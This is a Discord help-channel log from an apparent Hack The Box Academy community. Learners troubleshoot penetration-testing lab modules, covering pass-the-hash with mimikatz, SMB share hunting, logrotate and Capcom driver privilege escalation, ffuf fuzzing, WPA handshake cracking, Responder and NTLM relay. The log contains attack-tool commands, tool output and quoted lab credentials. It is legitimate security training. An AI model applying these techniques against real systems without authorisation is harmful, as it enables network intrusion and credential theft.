#modules

1 messages · Page 443 of 1

rustic kestrel
#

Gud both qualities i lack 😐

silver ocean
#

When I connected via RDP using PHT.....it worked...however after lsass dumping and running cmd as david via mimikatz using PTH..I tried to run the tool again but now I get this issue:

PS C:\tools> Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\Users\Public
 ===============================================================
 INVOKE-HUNTSMBSHARES
 ===============================================================
  This function automates the following tasks:

  o Determine current computer's domain
  o Enumerate domain computers
  o Check if computers respond to ping requests
  o Filter for computers that have TCP 445 open and accessible
  o Enumerate SMB shares
  o Enumerate SMB share permissions
  o Identify shares with potentially excessive privileges
  o Identify shares that provide read or write access
  o Identify shares thare are high risk
  o Identify common share owners, names, & directory listings
  o Generate last written & last accessed timelines
  o Generate html summary report and detailed csv files

  Note: This can take hours to run in large environments.
 ---------------------------------------------------------------
 |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
 ---------------------------------------------------------------
 SHARE DISCOVERY
 ---------------------------------------------------------------
 [*][08/10/2025 12:06] Scan Start
 [*][08/10/2025 12:06] Output Directory: c:\Users\Public\SmbShareHunt-08102025120634
 [*][08/10/2025 12:06] There appears to have been an error connecting to the domain controller.
 [*][08/10/2025 12:06] Aborting.

fathom pendant
silver ocean
#

well I am preparing for the exam...so you know doing this for CPTS

fathom pendant
#

@rustic kestrel don't dm people without asking permission for

fathom pendant
silver ocean
silver ocean
rustic kestrel
#

Just wanted to know bout that mentoring u had in ur description

fathom pendant
opal shuttle
#

i am getting blank rdp window

fathom pendant
#

It's freerdp not drawing the AUP screen

#

"By signing in you agree" corporate windows stuff

opal shuttle
#

ohh

fathom pendant
#

I think if you readjust the screen size (if you set /dynamic-resolution)
It fixes it

heavy dome
#

Can someone who has completed Windows Privilege Escalation Skills Assessment - Part I / Q3: Escalate privileges and submit the contents of the flag.txt file on the Administrator Desktop. Please tips if possible?

hybrid trench
#

Is it possible to make certain certificates in htb?

crystal cove
#

Hi Chat, I just solved both questions of the Understanding Log Sources & Investigating with Splunk - Skills Assesment, but i do not get how the author expected us to solve the second question: Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through SPL searches against all data the process that started the infection. Answer format: _.exe - was i supposed to find the flag with a SPL search or was the flag really just based on understanding the first question of the skills assessment ? I unfortunately found the flag thanks to a writeup but it did not explain how it got the answer. Like some reddit user mentionned, i expected the flag to be whatever program started the answer of the first question.

wild folio
#

Using CrackMapExec Module
Final Skill Assessment
Q2: Gain access to the SQL01 and submit the contents of the flag located in C:\Users\Public\flag.txt.
I've tried re-enumerating with my new creds A*** but I can't find anything? Could I DM someone here who's completed this?

gray yacht
gray yacht
wild folio
gray yacht
wild folio
mystic osprey
#

Hey guys, anybody did the LLM output attacks module? I need help in the skill assessment.

robust pecan
#

Good afternoon, I need help...
Module: Linux Privilege Escalation
Section: Logrotate
Objective: Escalate privileges and gain root

Problem: I can't make the logrotten exploit work. I have identified the file with cat /var/lib/logrotate.status and compiled the code on the target system. I have tried running the exploit a few times and performed multiple resents on the target. I searched on google and also tried searching for a solution on this channel's history.

How can I make it work? Do I need to edit the exploit code?

fathom pendant
heavy dome
prime ginkgo
#

hello im having "Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)" solutions timedatectl set-ntp 0 to disable time sync + ntpdate/rdate not solving my problem

fathom pendant
#

aside from that, vpn region can make a difference sometimes

prime ginkgo
marsh vessel
#

isn't this step to add the cert ?

rotund sorrel
#

Anyone ran into the rdp connection not working at all? Currently working on file transfers but cant remote into the linux box

#

ive tried my own machine with multiple vpn locations at different times of day, as well as the pwnbox

fathom pendant
fathom pendant
rotund sorrel
#

oh god

#

Im going to bash my head in with a pan

#

it said ssh for linux, rdp for windows

#

(╯°□°)╯︵ ┻━┻

fathom pendant
#

i was about to reply with the John Cena Gif

rotund sorrel
#

layer 8 issue bois, thank you @fathom pendant

fathom pendant
#

listen, reading is hard as a hacker. We traded literacy for tech skills... and even then i don't think i even have that 🥀

rotund sorrel
#

yea thing is im leaving my cushy and easy it audit/consultancy for the infinite pain that is technical security

rotund sorrel
#

Its so much more fun and fulfilling, but ive never ever felt more incompetent, save for my Msc thesis

thorny wind
#

I am doing the Cracking Passwords with Hashcat module, but I am getting stuck cracking the common password page. I am cracking 7106812752615cdfe427e01b98cd4083 which (through hashid) gives me:
[+] MD2
[+] MD5
[+] MD4
[+] Double MD5
[+] LM
[+] RIPEMD-128
[+] Haval-128
[+] Tiger-128
[+] Skein-256(128)
[+] Skein-512(128)
[+] Lotus Notes/Domino 5
[+] Skype
[+] Snefru-128
[+] NTLM
[+] Domain Cached Credentials
[+] Domain Cached Credentials 2
[+] DNSSEC(NSEC3)
[+] RAdmin v2.x
ofc I am not going to try all of these so I am trying the low-hanging ones like MD5 and NTLM but no luck so far. I am trying different default rulesets but esp if I have to hybrid this out I'll be running these for like hours and I think I am missing something

Any ideas/hints?

I am using the rockyou dataset as instructed, following the exercise and the hint but no luck yet:

the exercise is this:
Crack the following hash: 7106812752615cdfe427e01b98cd4083

And the hint says the following:
Use hashid to identify the hash, and then use one of the Hashcat built-in rule sets or hybrid mode to help you crack it.

thorny wind
#

I understand it might be a bit long of a message but I've been stuck on this for very long and idk what I'm supposed to be doing here, so if there's a hashcat pro in here it would be very much appreciated!

wild oriole
#

Hey guys, I'm trying to perform the "CVE-2020-0668" exploit, both locally and using the PwnBox with different US VPN, and I get the same result. Has anyone faced this issue?
Module: "Kernel Exploits" - Windows PrivEsc

normal dagger
#

Did you figure it out, I also tried spraying and brute forcing and can’t find anything :/ help lol!

foggy monolith
normal dagger
foggy monolith
#

It also tells you the default password format

fathom pendant
#

i generally dislike using the integrated terminal though

wild oriole
fathom pendant
#

it's very clunky and i've seen it kinda fail out and freeze more than it's helped

#

you're better off just running the pwnbox in fullscreen and going through it

wild oriole
robust pecan
# fathom pendant instead of trying to get a shell, try moving the file

Thanks for responding. I edited the payload to move the flag with mv flag.txt /home/htb-student/ and mv /root/flag.txt /home/htb-student/. The exploit runs completely, but I am unable to read the flag. It just renames backup to backup2 and creates an mlink to /etc/bash_completion.d. The folder disappears shortly after that, but there is no flag.

I have been trying to make this work for hours, thinking I will get it if I just try again... I appreciate your help. It would be great if you can give me another hint, otherwise I will just move on and try some other time.

fathom pendant
golden halo
#

Hey guys, I need help:
Module: Shells and Payloads
Section: Live Engagement
Objective: Exploit the target and gain a shell session

Problem: I'm logging into the foothold host and know that I need to go to the given IP to find a way to upload the payload I created. My issue is that the foothold host doesn't have a web browser, so I can't search up the IP through that, and if I try to search it up through the attack box it won't work. I did curl on the foothold host and it worked, but I don't know what next step to take from here

Any advice?

fathom pendant
#

:)

#

i do agree though there should be a desktop icon

golden halo
#

I feel dumb 😭 thank you guys

fathom pendant
#

(speaking of desktop, there's an important file there)

harsh sundial
#

hello i am curently on the footprinting module and i am at the part for smb and i need to find the domain can someone maybe give me a hint to what domain is because it isn't really clear to me ?

fathom pendant
#

(alternatively you can learn how to use a pivoting tool and say "screw the foothold"

fathom pendant
harsh sundial
#

i am in the beginning of the pentester path so i am still very new to this XD

#

i am also pretty sure i got the answer but it keeps saying i am wrong haha

#

ah okay but i do have a answer with rpcclient

#

but it says it is wrong

#

so it confuses the hell out of me haha

foggy hamlet
#

how to hack

glad narwhal
#

module name:Pivoting, Tunneling, and Port Forwarding
section name: SOCKS5 Tunneling with Chisel
Question: Unable to run Chisel on the pivot host (ubuntu) because it has a different version of Go than the one it was compiled with

cloud urchin
glad narwhal
#

is it possible to link to an example or instructions how to do that? Thank you

foggy hamlet
#

thank you in spainsh

cloud urchin
glad narwhal
#

ah Ok

#

muchas gracias en ingles

#

got the flag woohoo thanks

harsh sundial
#

hey i am still at the footprinting samba module i am stuck at the queston about finding aditional information and the one where i have to find the system path ?
any tips ?

fathom pendant
harsh sundial
#

okay thank you i will test some other stuff out then

#

do i connect on the specific share with rpc or just the ip ?

fathom pendant
harsh sundial
#

just the ip but it feels like i am missing something haha that is why i asked

fathom pendant
#

I believe they give you all the relevant commands

harsh sundial
#

thank you for the help

jaunty berry
#

In the AD Enumeration and Attacks skill assessment II, for question 8, I was able to get an Administrator NTLM hash using mimikatz, but that hash did not work to gain access to MSO1. Does anyone found an alternate way?

gray yacht
jaunty berry
gray yacht
jaunty berry
gray yacht
# jaunty berry Alright, TY! I’ll try something else.

If you have low level user access to MS01, I would do some simple enumeration that makes sense with what you are trying to accomplish or go through your mimikatz results from the other host and pass around identified credentials to see if any of them provide new access to anything.

fathom pendant
#

nxc <protocol> host (or host list file) [options]

jaunty berry
#

🫡

#

TY Fam!

fathom pendant
#

i learned it when i was redoing the updated password attacks module

brave field
fathom pendant
#

yep

#

you can create a host list like

DC01
MS01
File01

(or use the ips instead, the fqdn/name approach requires you to have it in your hosts file)

#

then the syntax i stated above

brave oasis
#

I am coding a file that decodes chess games and finds the most viable and most common move

#

i am having trouble lol

#

when i input to power shellpython lichess_move_aggregator.py --input lichess_db_standard_rated_2013-01.pgn --outdir results it cannot find the file even though i havbe it downloaded

#

the file name matches

fathom pendant
#

if it has nothing to do with an academy module: read and follow #welcome and ask in #programming 😉

brave oasis
#

This kind of project — analyzing millions of chess games programmatically — relates mostly to the Data Science and Computer Science modules in an academy setting,

fathom pendant
brave oasis
#

sorry lol

brave field
fathom pendant
fathom pendant
teal arrow
#

Can someone help, not sure why results aren't coming back..

left needle
fathom pendant
#

with ffuf and htb targets in general you use -u http://ip:port -H "host: FUZZ.academy.htb"

#

this is because .htb isn't a routed subdomain

#

also: the /etc/hosts file should never contain the port

left needle
#

Hi, I have a question related to the NETWORK ENUMERATION WITH NMAP module, specifically in the Host and Port Scanning section under Filtered Ports.
It mentions that a port is considered filtered when packets are rejected or dropped However, in the scan output, I see an ICMP error message with type=3/code=3 (port unreachable), and the port is marked as filtered.

Later in another module, I see the same ICMP error (type=3/code=3), but the port status is shown as closed instead of filtered.

Why does the same ICMP error code sometimes indicate a filtered port and other times a closed port? What causes this difference in interpretation?

fathom pendant
#

ah dug into the manual pages

#

the first one appears to be a Syn scan so code3/type3 -- filtered, where the second is udp, where code3/type3 returns closed

fathom pendant
left needle
fathom pendant
#

also, don't call me sir

brave field
left needle
#

Hi, I was trying to upgrade tty but when trying to exit I am stuck here, I cannot exit it without killing the process is there any other way out, I learnt it from getting started

cerulean cargo
#

Can anyone teach me cyber security i got little to no experience in this domain

compact patrolBOT
cerulean cargo
#

I only know how to do osint

cloud urchin
#

I gave you the link to get started

fathom pendant
#

@grizzled trellis #cwes message ; you'll need to utilize ffuf's filters

grizzled trellis
#

ok!

fathom pendant
#

i believe the relevant ones are explained in the section

cloud urchin
royal jetty
#

Does anyone know how to solve the Parameter Fuzzing - GET in Attacking Web Applications with Ffuf?

cloud urchin
royal jetty
#

filter out 986 but no output

grizzled trellis
#

im sorry, im so confused lol. im trying to get into this but i dont fully understand it..

cloud urchin
cloud urchin
royal jetty
cloud urchin
#

nope

#

review the command shown

#

actually that should work though

#

as long as the txt file is in your cwd

#

it is off though, you are using test as the value

#

not sure if that makes a difference here

royal jetty
#

Burp-parameter-names.txt is in the same folder. Can't I use test as the value?

cloud urchin
#

idk i didn't try it, i did what the module showed

proven plinth
flat grove
cloud urchin
cloud urchin
flat grove
#

I am capturing the correct AP and all but it says I dont have and am missing EAPOL frames when I try to capture the handshake. I’ve tried deauthing (both broadcast and targeted) and locking onto the channel/BSSID, but still can’t get a valid capture

fathom pendant
#

i think there's some thing with hashcat and pcap/pcapng

#

if it's what i think others have talked about here

flat grove
#

i see. I just wanted to make sure I wasnt doing anything wrong. Im sort of new but I put so much time into this one I have a pretty good understanding now

#

But if it helps i can share the module and stuff if that link i sent didnt work

fathom pendant
#

i haven't done that module nor do i have it unlocked, that's why i'm unsure

cloud urchin
#

i figured out the issue

#

@royal jetty You're using the IP in your command. I don't think the page responds to that.

fathom pendant
#

ah... vhosts are important

flat grove
#

@fathom pendant what are the things you heard about hashcat and pcap?

fathom pendant
#

just that for whatever reasons it doesn't like the format so you gotta use a tool like hcxpcapngtool

flat grove
#

I tried that even and I think it was saying I didnt have enough frames. Weird 🤦‍♂️

brave field
#

http://admin.academy.htb:PORT/admin/admin.php

royal jetty
#

Progress: [6453/6453] :: Job [1/1] :: 621 req/sec :: Duration: [0:00:10] :: Errors: 6453 :::

#

No output

acoustic owl
flat grove
#

You mean after i sent the deauth right? if so then yes I mean it said EAPOL which let me know SOMETHING got saved. And like there is even a WPA 2 hash when i broke down the file

#

its mainly when I tried to either use aircrack immediatley or transfer into to something hashcat can read i get that i dont have enough frames

#

I was hoping it was a HTB error but this is why i resulted here 🙂

cloud urchin
acoustic owl
flat grove
#

said there was no such command as cowpatty in my rdp host

acoustic owl
#

cowpatty -c -r yourfile-01.cap

royal jetty
cloud urchin
cloud urchin
flat grove
#

yes I was able to see my bssid. Because im on a macbook (soon to buy a pc lol) it was kinda cut off so i could only see 02:0

#

but still confident that i captured traffic

acoustic owl
flat grove
#

of course. And yes I did rdp into the machines IP using remmina

cloud urchin
#

handshake*

flat grove
#

change resolution?

cloud urchin
#

you said it was cut off so you couldn't see everything

#

i imagine it's because of low resolution or something

#

you should be able to see the entire output

flat grove
#

I wish i could send screen shots lol but on the left side of remminas UI there was a way to make it scaled and I did that. I will try again rn to make sure tho that im seeing the full output

flat grove
#

ok^

#

okay i can upload now give me a second im gonna run thru the whole process again

cloud urchin
#

take care not to post content from modules above tier 0

royal jetty
#

I've modified C:\Windows\System32\drivers\etc\hosts to add 94.237.48.12 and 94-237-48-12.uk-lon1.upcloud.host. However, when I run ffuf -u "http://94-237-48-12.uk-lon1.upcloud.host:57771/?FUZZ=test" -w burp-parameter-names.txt -fs 986
:: Progress: [6453/6453] :: Job [1/1] :: 162 req/sec :: Duration: [0:00:43] :: Errors: 0 ::
Ultimately, nothing happens.

cloud urchin
#

and that is not the right hostname, like i said, use the one you used previously to that

#

use the command given in the module, the only modifications you need to make is maybe the path to the wordlsit and the size you're filtering out

#

use the host shown in the module/command

flat grove
cloud urchin
#

if your capture file doesn't contain the handshake, you won't get the hash. simple as that.

flat grove
#

sheesh alright..

cloud urchin
#

does your airomon-ng output show the handshake captured like i highlighted for you?

flat grove
#

sure do

cloud urchin
cloud urchin
# flat grove sure do

Okay you got it. Now crack it, or use a tool to convert it to a format hashcat can use if you want to use hashcat.

flat grove
#

my next issue when i try to convert the cap file

cloud urchin
#

did it output a hash in the hash file?

#

if not maybe try restarting the target or changing servers/regions

flat grove
#

yes and hmmm changing servers/regions is something I havent tried yet.

autumn pilot
#
help upload
faint trellis
#

Hey! who could nudge me DACL II 2nd task?
I can modify logon script of a user who can link GPO but it seems he doesn't access it. This is a bug or I something missed?

mellow mist
#

FYI, the Attacking FTP module took me multiple attempts to work and spawn an FTP service on the target. I waited more than 60 seconds every time, might be useful to look into it

novel matrix
#

@tawny palm ?

autumn pilot
#

There is an example command in the Sliver module

#
upload http-beacon.exe C:/temp/http-beacon.exe
#

Within the commands and tools introduction section, it showcases the usage of the upload command as so

soft moon
autumn pilot
#

I have just tested the command, and it is working as expected

rustic sage
#

I have a Pixel 8A Graphene OS Phone. I Want to make it an Anonymity phone. I Want to make it a Safe phone. I Need to make it an Anonymity phone. I Want to make it a Privacy friendly phone. I Want to make it a Hardened phone. I Need to make it an Anonymity phone. I Want to make it a Safe phone.

You give me advice yes?

#

My phone is a Pixel 8A Graphene OS Phone. I Want to make it an Anonymity phone. I Need to make it a Hardened phone. I Want to make it a Safe phone..i Need to make it an Anonymity phone. I Want to make it a Safe phone. I Need to make jt a hardened phone. You give me advice yes?

#

@surreal rain

molten flame
#

Hello, Im new here please someone should help…
I have been trying to access my HTB terminal browser for some days now but it’s showing Connection time out..

soft moon
#

the cloud VM (pwn box) or target box?

soft moon
#

ok 1st of all why you ping the mods, second of I dont know you and so bold of you to assume I provide him to potentially suspicious activities, whether or not its used alongside malicious actives is 1 thing but why did you post this twice?

rustic sage
acoustic owl
soft moon
rustic sage
#

How can I get those questions

#

Downloaded

soft moon
#

man people really struggling to not read the rules

#

try to study the material or use the brain is bad enough an AI could probably give what you seek

autumn pilot
#

The first command fails as there isn't such a path on your system - /home/kali/HTB/Sliver/c:\temp\http-beacon.exe
The second command doesn't have the file name in the remote path
The third command is not escaping the backslash
The fourth command is missing the file name in the remote path

#

Please use the command that I mentioned:

upload http-beacon.exe C:/temp/http-beacon.exe
#

Ensure that the temp directory has been created (or present) in C:\

soft moon
storm elk
#

@rustic sage this is not relevant to this server

soft moon
#

hahahaha a staff / moderator is watching cant you understand hahahahaaha

waxen totem
soft moon
#

I have a feeling its some criminal trying to get free info lmfao goes to show some dumb rocks

#

actually no thats rude to rocks because rocks what got us computers xD

silver ocean
#

How do we run Responder for LLMNR Poisioning if we have a pivot host...and we cannot use Proxychains as it is only for TCP Traffic and we are talking about UDP...and Pivot does not has internet connection? and ...we are on linux pivot...if it was windows I know we could've used inveigh?

earnest sky
#

Hi

hallow dome
waxen totem
# silver ocean How do we run Responder for LLMNR Poisioning if we have a pivot host...and we ca...

https://github.com/Qazeer/OffensivePythonPipeline/tree/main/binaries/Responder

might wanna transfer this pre-built binary, other than that you could try to form an artificial VPN if you have root access using ssh

GitHub

Static standalone binaries for Linux and Windows (x64) of Python offensive tools. Compiled using PyInstaller, Docker for Windows, WSL2, and Make. - Qazeer/OffensivePythonPipeline

acoustic owl
sacred ermine
#

does anybody having the trouble with completing the CAPE journey? feels like the labs in modules are not working as they should, its embarrassing, I already reached out to support, just asking here if anyone got the same problem

#

the labs just broken completely, dont know the reason even why, just wasting few hours on my hopes that it will get sorted one day magiclly itself. haha, unbearable at this point

hallow dome
acoustic owl
hallow dome
native zealot
#

Can someone help me think ive got a technical issue

#

im doing CPTS > Password attacks > attacking windows credential manager > "What is the password mcharles uses for OneDrive?"

#

after struggling on it i looked at a walkthrough where he gets this

#

Cant add images 😐

#

he runs cmdkey /list and gets loads, I just get the one.

faint trellis
#

Hi mate! Are you still stuck here?

thin cradle
dry falcon
faint trellis
hazy grotto
#

Did you get connection to the target yet?

dry falcon
hazy grotto
#

Go to the tools directory

dry falcon
#

they run whoami /priv first SeLoadDriverPrivilege not there then they write something . The UACMe repo features a comprehensive list of UAC bypasses, which can be used from the command line.
then they again run same whoami command and SeLoadDriverPrivilege comes.

hazy grotto
#

SeLoadDriverPrivilege Load and unload device drivers Disabled

dry falcon
#

i want to load this SeLoadDriverPrivilege

hazy grotto
#

See that is disabled

#

Ok go to the tools directory

dry falcon
dry falcon
hazy grotto
#

go back one directory and list

dry falcon
#

ok

hazy grotto
#

Show me please

dry falcon
#
PS C:\tools> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeShutdownPrivilege           Shut down the system           Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled```
hazy grotto
#

BUDDDY

#

C:\Tools> dir

dry falcon
#
PS C:\tools> dir


    Directory: C:\tools


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        5/24/2021   3:11 PM                ExploitCapcom
-a----        5/24/2021   3:12 PM          10576 Capcom.sys
-a----        8/11/2025   2:36 AM         155134 drivers.txt
-a----        5/24/2021   3:11 PM          44920 DriverView.exe
-a----        5/24/2021   3:11 PM         119808 EnableSeLoadDriver
-a----        5/24/2021   5:25 PM          15360 EoPLoadDriver.exe```
hazy grotto
#

Go to that directory and type dir.

Quit with the whoami

dry falcon
#

whoami 😅 my bad sorry

hazy grotto
#

Try this

#

EoPLoadDriver.exe System\CurrentControlSet\Capcom

dry falcon
hazy grotto
#

I'm not sure if it matters but i was using cmd.exe as admin

#

Look at the section. "Automating the Steps"

#

You should be able to figure that out.

eternal vigil
#

Any help or hint will be much appreciated, Thankyou

brave field
#

Try using bloodhound and see if you find anything interesting

eternal vigil
#

alrighty thankyou

celest compass
#

Hi, I`ve been stuck on Attacking Authentication Skills Assessment, can anyone help on this one>

#

?

arctic nimbus
#

I'm doing Windows Attacks & Defense course, and I can't find the password.txt file anywhere, and I need it for some Hashcatting

brave field
gray yacht
opaque cosmos
#

i am on Working with IDS/IPS Suricata Rule Development Part 1 unable to connect to the rdp session i tried every xrdp command known to man kind the command loads the sessions rdp screen pops and closes ─(kali㉿kali)-[~]
└─$ xfreerdp /v:10.129.5.52 /u:htb-student /p:'HTB_@cademy_stdnt!' /relax-order-checks /rfx

[07:39:24:143] [35758:00008bb0] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x08 -> no RDP scancode found
[07:39:24:143] [35758:00008bb0] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x5D -> no RDP scancode found
[07:39:24:155] [35758:00008bb0] [WARN][com.freerdp.core.rdp] - [log_build_warn][0x55e4d58891e0]: *************************************************
[07:39:24:155] [35758:00008bb0] [WARN][com.freerdp.core.rdp] - [log_build_warn][0x55e4d58891e0]: This build is using [runtime-check] build options:
[07:39:24:155] [35758:00008bb0] [WARN][com.freerdp.core.rdp] - [log_build_warn][0x55e4d58891e0]: * 'WITH_VERBOSE_WINPR_ASSERT=ON'
[07:39:24:155] [35758:00008bb0] [WARN][com.freerdp.core.rdp] - [log_build_warn][0x55e4d58891e0]:
[07:39:24:155] [35758:00008bb0] [WARN][com.freerdp.core.rdp] - [log_build_warn][0x55e4d58891e0]: [runtime-check] build options might slow down the application

[07:39:24:155] [35758:00008bb0] [WARN][com.freerdp.core.rdp] - [log_build_warn][0x55e4d58891e0]: ********************

#

(kali㉿kali)-[~]
└─$ xfreerdp /u:htb-student /p:'HTB_@cademy_stdnt!' /v:10.129.5.52 /dynamic-resolution /relax-order-checks +glyph-cache
[07:40:40:233] [36465:00008e71] [ERROR][com.winpr.commandline] - [log_error]: Failed at index 6 [+glyph-cache]: Unexpected keyword

FreeRDP - A Free Remote Desktop Protocol Implementation
See www.freerdp.com for more information

also tried

#

i have also reset the target no working still i pinhg the ip its working fine

gray yacht
eternal vigil
# brave field Did you manage to progress?

i just continued now , i uploaded sharphound on it and got the zip on my local machine now gonna bootup bloodhound and see what can i find in there. will update you soon

opaque cosmos
#

ps help with my querie

native zealot
#

Idk why i cant put images here rip

eternal vigil
#

do anyone know the password for bloodhound on the htb instace ?

#

|| neo4j:HTB_@cademy_stdnt! || aint working

gray yacht
eternal vigil
#

it worked, thankyou @gray yacht

storm elk
rustic sage
#

need help with web requests

#

HyperText Transfer Protocol (HTTP)

#

it lets me run the command curl "server_ip"/download.php

#

but -s -o doesnt work

#

just says no url specified when i add those

eternal vigil
brave field
rustic sage
#

i figured it out

#

hadnt run the index.html command first

silver ocean
river field
#

Howdy. I'm doing the Stack Based buffer overflow module. In tn the "Take Control of EIP" it aks "Examine the Registers and submit the address of EBP as the Answer" I cannot seem to figure out what it's asking for. I've tried the content of the ebp register. I've tried overflowing the buffer to get the offset of ebp and adding that to the esp to get it's location on the stack. I just cannot figure out what it's asking for. Pic related

vapid prawn
#

If my subscription ends and I'm in the middle of a module, will I lost my progress in it, or just the access to it?

summer tapir
#

I'm getting the same, did you find any solution to this?

gray yacht
analog carbon
vapid prawn
#

Thanks a lot for the explanation, guys!

soft moon
#

could I please get some help command injection is quite hard
https://academy.hackthebox.com/module/109/section/1038
from the last section I have a got the users home dir but really brain fried on how to get the cat command to work as it either gives blank output or invalid output 🙁

#

yes through c'a't$ etc etc

#

oh really?? didnt come to me but I do some testing

#

so then by logic oooo im so stupid I might rest I did
c'a't'$ etc etc

#

yes I saw that when HTB was mentioned in the module somewhere about if a network active occurs in the network tab of inspect

#

ok thanks I have to re read once I get better sleep I think ive been awake too long

boreal vessel
#

Hello admin, any issue with this lab - Skills Assessment - Using Web Proxies
https://academy.hackthebox.com/module/110/section/1055

I'm getting the same issue both on my local kali and the Parrot pwnbox
Using ZAP:
An exception occurred while attempting to connect to: https://94.237.58.104:51951/lucky.php
The exception was:
Unsupported or unrecognized SSL message
Root cause:
SSLException: Unsupported or unrecognized SSL message
The following document may be of assistance in resolving this failure:
https://www.zaproxy.org/faq/how-to-connect-to-an-https-site-that-reports-a-handshake-failure/

Without ZAP:
This site can’t provide a secure connection
94.237.58.104 sent an invalid response.

grand timber
cloud urchin
grand timber
cloud urchin
#

nope just the 'ssh' command

#

ssh <user>@<ip> -p <port>

grand timber
#

it says used the given port but im not seeinig the port

fathom pendant
#

short answer though: remove the :38433 from the user1@ip portion in your command

grand timber
#

Ah ibsee

#

Na I understood from the long. Thank you.

fathom pendant
#

good luck!

grand timber
#

Uhh I can't type now-

grand timber
fathom pendant
grand timber
#

oh makes sense

#

thank you so much, sorry I thought I broke it XD

dusk holly
#

Sorry asking questions in another section, have anybody submitted walkthrough for a machine, I submitted a walkthrough about 3 days ago, and it still says under review, does it take that long usually

leaden island
#

yo guys

#

im on bleeding edge vulns from AD enum

#

ive fired up the target, which is the ACADEMY-EA-ATTACK01

#

im supposed to ssh into it and do exploits on the DC01 on 172.16.5.5

#

but its offline

#

i used the scanner scripts for the vulnerabilities and all returned a connection problem

#

also nmap all ports are filtered

dusk holly
#

Jerry it is like 2019

#

does it take more for older machines

#

also why i do not have permissions for general

#

yoo thank you so much man i did not know there was this much sections

grand timber
#

So, I got to the ID_RSA key looking thing but idk what to do now

fathom pendant
grand timber
#

do i run a vim for ID rsa on a seprater command line?

opal shuttle
lament oak
#

Can anyone help me on credential hunting in network shares. I only get the hr_b***** username and it's password nothing useful when I use grep -ir "pass"

grand timber
opal shuttle
opal shuttle
blissful rampart
#

hi

grand timber
opal shuttle
#

you can login into that machine with the private key

grand timber
#

"Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'."

opal shuttle
#

where you found this ssh key?

#

for which user is that ssh key

opal shuttle
#

do you have password?

#

of user2?

grand timber
#

for User2 i dont but I do for the main user

river field
#

Hi. I'm struggling with a question "Submit the size of the stack space after overwriting the EIP as the answer. (Format: 0x00000)". I believe the answer should be one of two things. The first is ffffffff - esp register. The other is ffffffff - the address after the eip register. Neither seems correct please help clarify where I'm making wrong assumptions. This is in Stack-Based Buffer Overflows on Linux x86 module section Generating Shellcode

river field
leaden island
#

yo guys

#

im trying to get gettgtpkinit.py but im having a python problem

#

oscrypto.errors.LibraryNotFoundError: Error detecting the version of libcrypto

#

although its already installed system wide

shut wraith
#

Hello

AD Enum & Attack

Skills Assessment # 2

I start responder on both interfaces, I do not retrieve any Hash....

opal shuttle
#

You just need to start on the 2nd one on the internal network

#

Something like esc2

#

Sudo responder -I <2nd interface name>

lament oak
#

Can anyone help me on credential hunting in network shares. I only get the hr_b***** username and it's password nothing useful when I use grep -ir "pass"

void dove
#

I'm having trouble finding Nicholas's SID. What is the client ID of "Nicholas Taylor"? It's one of the last activities of the pentest module in a nuyshell. CJCA
Help, please!

shut wraith
opal shuttle
lament oak
opal shuttle
lament oak
#

Yes

opal shuttle
#

I remember a little bit , there is folder or share called tools

lament oak
#

Yeah I tried to do it by Linux

opal shuttle
#

You need to manually explore all these things

lament oak
#

Used manspider

opal shuttle
#

Nothing worked for me i guess

lament oak
opal shuttle
#

Netexec was giving error

lament oak
#

But all I see is a html report and some .CSV files

opal shuttle
#

You got some credentials?

lament oak
lament oak
opal shuttle
#

Ummm

#

Can you share module link

lament oak
opal shuttle
#

I will open in mobile

opal shuttle
#

You can dm me

faint trellis
#

Guys, who can help me with DACL II SA 2nd question?
I believe the target user has to trigger his logon script but he hasn't. What I do wrong?

vapid maple
#

Hello all! sorry for all the questions. Im working on the Citrix breakout section. Im trying to import PowerUp.ps1 but getting an powershell error and cant set the execution policy. any ideas?

rich obsidian
#

Doing the Medium foot printing end of module lab. I am getting a permission denied error every time I try to cd into the folder that I mounted with the nfs share. I have tried this in my own VM and in their in built lab. It says that the permissions for the folder are for nobody and nogroup which should make everyone use the same anonymous account? I could literally list the contents with the rpcinfo nmap script. What is going on?

rich obsidian
#

Never mind. I got it. NGL when I found out what you actually had to do, it kind of pissed me off. I literally tried to modify my personal groups and UIDs and GIDs because of the authentication and authorization bit in the actual lesson. Then enumerated every single other service to no avail. Feels very gimicky and like a gotcha. How can I prepare myself for something like that on the actual exam? I wouldn't have even come close to considering that as even a possibility.

vapid maple
fathom pendant
fathom pendant
#

@silent kindle please dont spoil passwords

rich obsidian
rich obsidian
fathom pendant
rich obsidian
fathom pendant
silent kindle
fathom pendant
#

if they match, then no errors in the transfer
if they don't you'll need to retransfer over

silent kindle
fathom pendant
#

to ensure it isn't corrupted :)

silent kindle
#

ohh one sec

#

you want to know the hash?

rich obsidian
# fathom pendant Yep

Used sudo mount -t nfs <target-IP>:/<target-share> ./tech_support_nfs_share/ -o nolock,vers=3 No change, still bad permissions. I imagine nobody:nobody is a different case than nobody:nogroup. Definitely gonna have to set this one up in the lab

fathom pendant
#

yeah it looks like there's some other stuff going on

#

¯_(ツ)_/¯

#

in general though "permission denied" is typically just "sudo to do it"

wise tapir
wise tapir
fathom pendant
#

my dms aren't open for rando code review. and it sounds like you're using your code for doing something illegal

fathom pendant
fathom pendant
#

if you're using it to attack instagram or other things like that: it's illegal

harsh gorge
fallow horizon
#

Srry guys i dont know where to ask this question, combined that i have some channels blocked. But i was doing the FAWN machine and on this question** What is the command we need to run in order to display the 'ftp' client help menu?** i clearly have the answer, searched it many times over but it says its incorrect on all possible formats

left lintel
harsh gorge
#

Did you drop it to HR or IT-Tools

left lintel
#

IT-Tools

#

Are you using slinky or drop-sc?

harsh gorge
#

drop-sc

left lintel
#

When I did it I used slinky and responder instead of ntlmrelayx and that worked for me

harsh gorge
#

Im on the third question where I need to relay the hash

left lintel
#

